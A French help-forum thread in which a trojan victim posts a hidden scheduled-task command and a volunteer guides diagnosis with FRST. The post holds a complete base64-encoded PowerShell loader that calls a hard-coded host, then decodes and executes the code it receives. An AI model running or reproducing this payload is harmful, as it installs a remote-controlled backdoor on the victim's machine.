Sujet Précédent Sujet Suivant

Cheval de troie

Fermé
KingkoPop - 4 juin 2022 à 18:04
bazfile Messages postés 56686 Date d'inscription samedi 29 décembre 2012 Statut Non membre Dernière intervention 22 décembre 2024 - 7 juin 2022 à 17:55
Bonjours, J'ai eu un cheval de troie qui a infecté ma machine et j'ai vue qu'ils m'ont rajouté des tache dans le planificateur nottement celui la que j'ai du mal a comprendre:
Dans l'invite de commande il fait cette commande:

/c powershell -WindowStyle Hidden -E "JAB2ACAAPQAgACIAMAAiADsACgAkAGwAdgAgAD0AIAAiADMAIgA7AAoAJABkACAAPQAgACIAdABvAG8AYgBsAHkAYwBhAHIAcwAuAGMAbwBtACIAOwAKACQAZQBwACAAPQAgACIAVwB5AEkAegBNAEQASQB3AE0AVABZAHoATQB6AGcANABOAEQAZwAzAE0AegBZAHgATgBpAEkAcwBNAFQAWQAwAE4AagBRADUATgBUAGcAMQBPAEYAMAA9ACIAOwAKAAoAJAByAHAAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABMAG8AZwBpAFMAaABkAHIAXAAiADsACgAkAHIAbgAgAD0AIAAiAFMAZQB0AHQAaQBuAGcAcwAiADsACgAKACQAYQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAHQAcgB5ACAAewAKAAkAJABqAHAAPQAkAGEALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcAApACkAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7AAoAfQAgAGMAYQB0AGMAaAB7AH0ACgAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAGYAdQBuAGMAdABpAG8AbgAgAGQAKABbAHMAdAByAGkAbgBnAF0AJABkAGUAKQAgAHsACgAJACQAZABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABlACkAOwAKAAoACQAkAHMAdAA9ACQAYQAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABkAGIAWwAwAC4ALgA0AF0AOwAKAAoACQAkAGkAPQAwADsACgAJACQAbAA9ACQAZQBkAC4ATABlAG4AZwB0AGgAOwAKAAkAJABrAD0AQAAoACkAOwAKAAoACQBbAGEAcgByAGEAeQBdADoAOgBSAGUAcwBpAHoAZQAoAFsAcgBlAGYAXQAkAGsALAAkAHMAdAAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAcwB0ACkAIAB7ACQAawBbACQAaQArACsAXQA9ACQAYgAgAC0AYgB4AG8AcgAgACQAZQBkAFsAJABpACUAJABsAF0AfQAKAAoACQAkAGIAcwA9ACQAZABiAFsANQAuAC4AJABkAGIALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAYQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAHQAcgB5ACAAewAKAAkACQB0AHIAeQAgAHsACgAJAAkACQBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcgBwACkAKQAgAHsACgAJAAkACQAJAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcgBwACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAHIAcAAgAC0ATgBhAG0AZQAgACQAcgBuADsACgAJAAkACQAJACQAagBkACAAPQAgAGQAKAAkAHIAKQA7AAoACgAJAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0AIABlAGwAcwBlACAAewAKAAkACQAJACQAdgAgAD0AIAAkAGoAZABbADAAXQA7AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAGQAdAAgAD0AIAB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAC8AeAA/AHUAPQAkAHUAJgBpAHMAPQAkAGkAcwAmAGwAdgA9ACQAbAB2ACYAcgB2AD0AJAB2ACIAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAKAAkACQAJACQAagBkADIAIAA9ACAAZAAoACQAZAB0ACkAOwAKAAkACQAJAGkAZgAgACgAJABqAGQAMgBbADAAXQAgAC0AZwB0ACAAJAB2ACkAIAB7AAoACQAJAAkACQAkAHYAMgAgAD0AIAAkAGoAZAAyAFsAMABdADsACgAKAAkACQAJAAkATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcgBwACAALQBOAGEAbQBlACAAJAByAG4AIAAtAFYAYQBsAHUAZQAgACQAZAB0ACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIAUwB0AHIAaQBuAGcAIgAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkACQAkAGoAZAAgAD0AIAAkAGoAZAAyADsACgAJAAkACQAJACQAZQB4ACAAPQAgACQAdAByAHUAZQA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZQB4ACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQBzAHQAbwBwADsACgAJAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAJAHQAcgB5ACAAewAKAAkACQAJAAkAaQBlAHgAIAAkAGoAZABbADEAXQA7AAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACQAJAH0ACgAKAAkACQB0AHIAeQAgAHsACgAJAAkACQAkAHMAbABzACAAPQAgACgAKABnAGUAdAAtAHIAYQBuAGQAbwBtACAANwAwACAALQBtAGkAbgBpAG0AdQBtACAANQAwACkAKgA2ADAAKQA7AAoACQAJAAkAJAB0AHMAIAA9ACAAWwBpAG4AdABdACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAJQBzACkAOwAKAAoACQAJAAkAOgBzAGwAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAgAHsACgAJAAkACQAJAHQAcgB5AHsACgAJAAkACQAJAAkAcgB1AG4AKAAkAGQALAAkAHUALAAkAGkAcwApADsACgAJAAkACQAJAH0AYwBhAHQAYwBoAHsAfQAKAAoACQAJAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAoAGcAZQB0AC0AcgBhAG4AZABvAG0AIAA2ADUAIAAtAG0AaQBuAGkAbQB1AG0AIAAyADUAKQA7AAoACQAJAAkACQAkAHQAcwAyACAAPQAgAFsAaQBuAHQAXQAoAEcAZQB0AC0ARABhAHQAZQAgAC0AVQBGAG8AcgBtAGEAdAAgACUAcwApADsACgAKAAkACQAJAAkAaQBmACAAKAAoACQAdABzADIALQAkAHQAcwApACAALQBnAHQAIAAkAHMAbABzACkAIAB7AAoACQAJAAkACQAJAGIAcgBlAGEAawAgAHMAbAA7AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9ACAAYwBhAHQAYwBoAHsAfQAKAAkAfQAgAGMAYQB0AGMAaAB7AH0ACgB9AA=="

Ayant vue cette monstruosité je me demande comment retrouvé la chose qui est Hidden pour pouvoir comprendre ce qu'il fait avec ce fichier.

Ma question est: Comment on peut retrouvé cette chose ?

Merci d'avance !
A voir également:

2 réponses

Réponse 1 / 2
bazfile Messages postés 56686 Date d'inscription samedi 29 décembre 2012 Statut Non membre Dernière intervention 22 décembre 2024 19 342
5 juin 2022 à 11:40
Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

Clique sur Analyser

Attention, attendre que les messages disant que l'analyse est terminée s'affichent



À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition


Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
0
Réponse 2 / 2
KingkoPop
Modifié le 7 juin 2022 à 17:44
Bonjour,
Merci de ta réponse voici les 2 fichiers txt:
Addition.txt : https://www.cjoint.com/c/LFhohXiTonV
FrST.txt : https://www.cjoint.com/c/LFhoifOXM5V
Merci d'avance <3
0
bazfile Messages postés 56686 Date d'inscription samedi 29 décembre 2012 Statut Non membre Dernière intervention 22 décembre 2024 19 342
7 juin 2022 à 17:55
Bonjour.
Il y a effectivement un reste de cheval de Troie, il y a bien une tâche planifiée qui est due à voicemeeter as-tu acheté Voicemeeter ou est-ce une version "non officielle" ?
J'attends ta réponse afin de faire un script de désinfection.
0

Discussions similaires

expressions francaises
bifaka -
lanonyme -

4 réponses
L'antivirus ESET NOD32 bloque UPTOBOX ( HTML/ScrInject.B ).
Logan -
Snoopyx -

10 réponses
Présence ou non de cheval de troie ?
hunter55 -
Malekal_morte- -

14 réponses
Nom d'une musique classique
panoramaaa -
Thierry -

9 réponses
windows defender cheval de troie
dplonguet -
Faarid.31 -

3 réponses